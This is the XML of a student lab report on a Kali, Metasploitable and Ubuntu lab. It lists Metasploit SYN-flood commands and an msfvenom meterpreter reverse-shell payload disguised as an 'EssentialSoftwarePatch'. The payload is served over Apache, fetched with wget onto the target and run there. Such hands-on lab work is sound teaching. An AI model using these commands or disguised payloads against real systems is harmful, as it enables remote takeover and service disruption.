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746079" w14:textId="2E7B875B" w:rsidR="009F79DE" w:rsidRDefault="00E6685E" w:rsidP="009F79DE">
      <w:r>
        <w:t xml:space="preserve">DoS commands used: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54048C51" w14:textId="74FD8B5D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“ifconfig” in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to get the target IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F4D527" w14:textId="585A3A7F" w:rsidR="009F79DE" w:rsidRDefault="009F79DE" w:rsidP="009F79DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -l -p 10010” in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to start a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server on port 10010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188309EF" w14:textId="18991AA6" w:rsidR="009F79DE" w:rsidRDefault="009F79DE" w:rsidP="009F79DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 192.168.1.7 10010” in Ubuntu to connect to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server created in the above step.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A00FF9" w14:textId="1373FB0A" w:rsidR="009F79DE" w:rsidRDefault="009F79DE" w:rsidP="009F79DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” in Kali to star the Metasploit framework console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63727058" w14:textId="159B5018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“search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>synflood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to search for the location of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>synflood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE7007E" w14:textId="7FE334F6" w:rsidR="009F79DE" w:rsidRDefault="009F79DE" w:rsidP="009F79DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“use auxiliary/dos/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>synflood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to use the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>synflood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F907687" w14:textId="0539A32C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“show options” in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to show the parameters used in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>synflood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F358EFA" w14:textId="18560D93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“set RHOSTS 192.168.1.7” in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to set the RHOSTS parameter to the target IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671CD83F" w14:textId="7634564F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“set RPORT 10010” to set the target port to the port used in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session created in step 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E00D55" w14:textId="1BF0697F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“exploit” in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to run the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>synflood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710BDC7D" w14:textId="4E1677AE" w:rsidR="009F79DE" w:rsidRDefault="009F79DE" w:rsidP="009F79DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcpdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000C59FA">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> eth0 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 192.168.1.7 -w </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>packets.pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>” in a new kali terminal to capture the packets being sent to the target IP address and save in a log file called “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>packets.pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6794D3" w14:textId="6C2C4846" w:rsidR="009F79DE" w:rsidRDefault="009F79DE" w:rsidP="009F79DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“ls -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” in the Kali terminal to show the size of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>packets.pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DD8363" w14:textId="330B7C85" w:rsidR="009F79DE" w:rsidRDefault="009F79DE" w:rsidP="009F79DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I then opened the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>packets.pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to see the contents. The types of packets being sent were SYN packets which start the three-way handshake protocol that TCP connections use</w:t>
      </w:r>
      <w:r w:rsidR="006425B1">
        <w:t>. These packets had headers but were otherwise empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB4BF2D" w14:textId="749CEBA3" w:rsidR="00865C6C" w:rsidRDefault="006425B1" w:rsidP="009F79DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">While the exploit was running, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and Ubuntu were still able to communicate if the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session was created before the exploit was run. However, if I created a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session while the exploit was running, there was no communication between </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and Ubuntu. </w:t>
      </w:r>
      <w:r w:rsidR="00960F6F">
        <w:t xml:space="preserve">As suggested, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">I tried this on the host-only network as well and was still able to communicate even if I created the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session while the exploit was running. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0F957B" w14:textId="4DF858F8" w:rsidR="006425B1" w:rsidRDefault="00865C6C" w:rsidP="00865C6C">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC346DD" w14:textId="50C8F66D" w:rsidR="00865C6C" w:rsidRDefault="00865C6C" w:rsidP="00865C6C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>DoS screenshots:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492B36EC" w14:textId="19E6DEF1" w:rsidR="00865C6C" w:rsidRDefault="00865C6C" w:rsidP="00865C6C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76118750" wp14:editId="25E47E12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S-msfconsol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89E9" w14:textId="40842615" w:rsidR="00865C6C" w:rsidRDefault="00865C6C" w:rsidP="00865C6C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A28412" w14:textId="1C35708B" w:rsidR="00865C6C" w:rsidRDefault="00865C6C" w:rsidP="00865C6C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FAB3ECF" wp14:editId="2ED428FE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S-msfconsol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B659" w14:textId="7468FCD7" w:rsidR="00865C6C" w:rsidRDefault="00865C6C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E52470" w14:textId="7AB8CCB3" w:rsidR="00865C6C" w:rsidRDefault="00865C6C">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BA947B" w14:textId="14DF0B54" w:rsidR="00865C6C" w:rsidRDefault="00865C6C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AB1B20F" wp14:editId="6798C253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file_content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446C" w14:textId="187FE0B1" w:rsidR="00865C6C" w:rsidRDefault="00865C6C">
      <w:r>
        <w:t>Wireshark screenshot of log file contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E91D981" w14:textId="29C3B9C5" w:rsidR="00F31082" w:rsidRDefault="00865C6C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="688EDEB3" wp14:editId="13B592AB">
            <wp:extent cx="5943600" cy="3943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file_siz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3B95" w14:textId="3E640B42" w:rsidR="00865C6C" w:rsidRDefault="00865C6C">
      <w:r>
        <w:t xml:space="preserve">Kali screenshot of </w:t>
      </w:r>
      <w:r w:rsidR="00E518DC">
        <w:t xml:space="preserve">capturing packets and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E518DC">
        <w:t>packets.cpap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E518DC">
        <w:t xml:space="preserve"> file size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A884B77" w14:textId="1F10C4FC" w:rsidR="00E518DC" w:rsidRDefault="00E518DC">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFB6681" w14:textId="509836BF" w:rsidR="00E518DC" w:rsidRDefault="00E518DC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="251F9B2B" wp14:editId="49885E58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S-metasploi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1157" w14:textId="6ED9538F" w:rsidR="00E518DC" w:rsidRDefault="00E518DC">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> screenshot showing communication </w:t>
      </w:r>
      <w:r w:rsidR="008F1F37">
        <w:t>possible</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> unless the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session was created while the exploit was running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6161C180" w14:textId="0A7AA43D" w:rsidR="00865C6C" w:rsidRDefault="00E518DC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70B98B32" wp14:editId="5C7D4939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S-ubunt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8A2D" w14:textId="1FCF0887" w:rsidR="00E518DC" w:rsidRDefault="00E518DC">
      <w:r>
        <w:t xml:space="preserve">Ubuntu screenshot </w:t>
      </w:r>
      <w:r w:rsidR="008F1F37">
        <w:t xml:space="preserve">showing communication possible unless the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008F1F37">
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008F1F37">
        <w:t xml:space="preserve"> session was created while the exploit was running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283C2AEE" w14:textId="36E97F00" w:rsidR="005915DA" w:rsidRDefault="005915DA">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Backdoor commands used</w:t>
      </w:r>
      <w:r w:rsidR="00F31082">
        <w:t xml:space="preserve"> (commands </w:t>
      </w:r>
      <w:r w:rsidR="009F79DE">
        <w:t>were used</w:t>
      </w:r>
      <w:r w:rsidR="00F31082">
        <w:t xml:space="preserve"> in</w:t>
      </w:r>
      <w:r w:rsidR="00217CF5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F31082">
        <w:t xml:space="preserve">Kali </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00F31082">
        <w:t>unless stated otherwise)</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B37C390" w14:textId="3F031DB4" w:rsidR="005915DA" w:rsidRDefault="005915DA" w:rsidP="005915DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ifconfig to get kali’s IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75975316" w14:textId="037196E7" w:rsidR="005915DA" w:rsidRDefault="005915DA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msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/ LHOST=192.168.1.6 LPORT=10010 -f elf &gt; “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hunterDonald-EssentialSoftwarePatch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>”.elf</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>” to create the backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B6DA7C" w14:textId="0C19CD54" w:rsidR="005915DA" w:rsidRDefault="005915DA" w:rsidP="005915DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“apache2ctl start” to start the apache server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E6BE6B" w14:textId="1C938C33" w:rsidR="005915DA" w:rsidRDefault="005915DA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systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> status apache2” to check that the server started </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63763C9E" w14:textId="72CB48B3" w:rsidR="005915DA" w:rsidRDefault="005915DA" w:rsidP="005915DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">“cp </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hunterDonald-EssentialSoftwarePatch.elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /var/html/www” to copy the file to the server root directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB0E918" w14:textId="6FE2B6D3" w:rsidR="00F31082" w:rsidRDefault="00F31082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wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00276D06">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.1.6/hunterDonald-EssentialSoftwarePatch.elf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">” from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E6685E">
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t>etasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> terminal to download the malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600E08BF" w14:textId="2EC368DF" w:rsidR="00F31082" w:rsidRDefault="00F31082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ugo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rwx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hunterDonald-EssentialSoftwarePatch.elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="00E6685E">
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E6685E">
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E6685E">
        <w:t xml:space="preserve"> terminal </w:t>
      </w:r>
      <w:r>
        <w:t>to make the file readable, writable, and executable for everyone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E87344" w14:textId="14DB52C5" w:rsidR="005915DA" w:rsidRDefault="005915DA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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” to start the Metasploit framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D02FC73" w14:textId="199AFACC" w:rsidR="005915DA" w:rsidRDefault="005915DA" w:rsidP="005915DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">“search handler” to search for handler </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1087A42E" w14:textId="315D9375" w:rsidR="005915DA" w:rsidRDefault="005915DA" w:rsidP="005915DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“use exploit/multi/handler” to use the handler exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEECBE3" w14:textId="69941808" w:rsidR="005915DA" w:rsidRDefault="005915DA" w:rsidP="005915DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">“search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” to search for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CF68B4" w14:textId="6207E0FB" w:rsidR="005915DA" w:rsidRDefault="005915DA" w:rsidP="005915DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">“set payload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” to use the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634EEF4C" w14:textId="418BD551" w:rsidR="005915DA" w:rsidRDefault="005915DA" w:rsidP="005915DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“show options” to see the parameters that need to be set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C835606" w14:textId="356A5FDE" w:rsidR="005915DA" w:rsidRDefault="005915DA" w:rsidP="005915DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“set LHOST 192.168.1.6” to set the LHOST parameter to Kali’s IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CECA083" w14:textId="3AAA7B03" w:rsidR="005915DA" w:rsidRDefault="005915DA" w:rsidP="005915DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">“set LPORT 10010” to set the listening port to </w:t>
      </w:r>
      <w:r w:rsidR="00F31082">
        <w:t>the same as in the malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393DEE38" w14:textId="2D154AFE" w:rsidR="00F31082" w:rsidRDefault="00F31082" w:rsidP="005915DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hunterDonald-EssentialSoftwarePatch.elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E6685E">
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t>etasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> terminal to run the malware</w:t>
      </w:r>
    </w:p>
